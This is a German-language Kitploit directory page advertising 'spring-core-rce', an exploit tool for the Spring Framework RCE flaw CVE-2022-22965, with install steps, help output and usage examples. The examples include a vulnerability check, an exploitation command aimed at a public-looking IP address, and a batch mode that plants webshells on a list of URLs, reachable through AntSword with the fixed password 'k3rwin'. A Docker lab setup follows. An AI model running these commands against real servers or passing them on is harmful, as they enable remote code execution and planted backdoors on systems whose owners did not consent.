Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
spring-core-rce — Spring-Framework RCE-Schwachstelle CVE-2022-22965 | Kitploit
Tools/GitHubGitHub/k3rwin/spring-core-rce
AufklärungPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubk3rwin/spring-core-rce

spring-core-rce

Spring-Framework RCE-Schwachstelle CVE-2022-22965

Repository anzeigen
28112vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring Core RCE/CVE-2022-22965

Betroffen: Spring Framework und davon abgeleitete Frameworks mit JDK>=9

Artikel-Link

Das Skript dient ausschließlich zu Lernzwecken. Bei anderweitiger Verwendung übernimmt der Autor keinerlei rechtliche Verantwortung.

1.Installation

root@kitploit:~
pip3 install -r requirements.txt

2.Verwendung

root@kitploit:~
$ python3 spring-core-rce.py -h

 .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
{ {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'


                                                 Spring framework Core RCE
                                                                  By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]

Spring framework Core 0day RCE 帮助指南

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url
  -s SYSTEM, --system SYSTEM
                        指定目标主机操作系统,默认linux,参数为win/linux
  -r FILE, --file FILE  指定url文件,批量写马

3.Beispiel

Verlustfreie Erkennung

-u,--url oder -f,--file für die Stapelerkennung verwenden

-c,--check, Parameter ist ein selbst gehosteter HTTP-Dienst. Mit python3 -m http.server 80 lässt sich schnell ein Webserver aufsetzen

Hauptsächlich im internen Netzwerk zu verwenden, wenn eine verlustfreie Schwachstellenerkennung erforderlich ist

root@kitploit:~
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

image-20220422153433867

Mit -u die URL angeben, mit -s das Betriebssystem angeben. Parameter: linux oder win, Standard ist linux

root@kitploit:~
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"

image-20220331203209702

image-20220331203858753

Mit -r Webshells in Batch schreiben. Verbindung mit AntSword herstellen, Passwort ist k3rwin

root@kitploit:~
python3 spring-core-rce.py -r "urls.txt"

image-20220402112140568

image-20220402112349943

4.Zielumgebung

①.Lokales Docker-Labor aufsetzen:

docker pull vulfocus/spring-core-rce-2022-03-29:latest

docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29

②.Online-Testumgebung

Tool herunterladen